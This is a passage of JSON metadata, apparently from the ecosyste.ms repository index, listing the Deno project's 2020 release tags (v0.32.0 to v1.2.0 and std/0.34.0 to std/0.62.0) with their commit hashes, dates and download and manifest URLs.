,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_u